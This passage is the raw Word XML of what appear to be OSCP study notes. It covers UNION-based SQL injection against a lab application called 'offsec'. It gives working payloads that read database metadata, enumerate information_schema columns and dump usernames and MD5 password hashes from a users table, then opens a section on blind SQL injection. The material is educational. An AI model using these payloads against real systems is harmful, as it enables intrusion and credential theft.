        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT null, null, database(), user(), @@version  -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016CA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we already verified the expected output, we can omit the percentage sign and rerun our modified query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2273300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 13: Fixing the SQL Query" id="112" name="image116.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 13: Fixing the SQL Query" id="0" name="image116.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId462"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2273300"/>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16CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This time, all three values returned correctly, including </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the current database name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016CE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's extend our tradecraft and verify whether other tables are present in the current database. We can start by enumerating the</w:t>
      </w:r>
      <w:hyperlink r:id="rId463">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId464">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">information schema</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the current database from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema.columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016CF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll attempt to retrieve the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> database belonging to the current database. We'll then store the output in the second, third, and fourth columns, leaving the first and fifth columns null.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">null, table_name, column_name, table_schema, null </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema.columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table_schema=database() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1381"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how to get the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">column name of each table</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as well as having the schema specified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1381"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In mysql, schema and database are the same thing. In other SQL languages, a single database can have many schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1381"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table_schema</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" column will return the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">database </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1381"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is specific to the current database, as specified in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table_schema=database() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> database()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns the name of current database</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running our new enumeration attempt results in the below output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1841500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 14: Dumping the Current Database Tables Structure" id="442" name="image450.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 14: Dumping the Current Database Tables Structure" id="0" name="image450.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId465"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1841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D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="876"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have two table names (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">customers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="876"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second columns shows all the available for each table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="876"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Third column specifies the database (a.k.a schema)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This output verifies that the three columns contain the table name, the column name, and the current database/schema, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interestingly, we discovered a new table named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that contains four columns, including one named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's craft a new query to dump the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> null, username, password, description, null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This gets columns from specific table (here it's the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the above statement, we'll again attempt to store the output of the username, password, and description in the web application table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1041400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 15: Dumping Users Credentials" id="541" name="image526.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 15: Dumping Users Credentials" id="0" name="image526.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId466"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1041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E1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! Our UNION-based payload was able to fetch the usernames and MD5 hashes of the entire users table, including an administrative account. These</w:t>
      </w:r>
      <w:hyperlink r:id="rId467">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId468">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MD5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> values are encrypted versions of the plain-text passwords, which can be reversed using appropriate tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lbqwrktvisf" w:id="189"/>
      <w:bookmarkEnd w:id="189"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injections (opposite of in-band)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (10.2.3. Blind SQL Injections):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E8">
      <w:pPr>
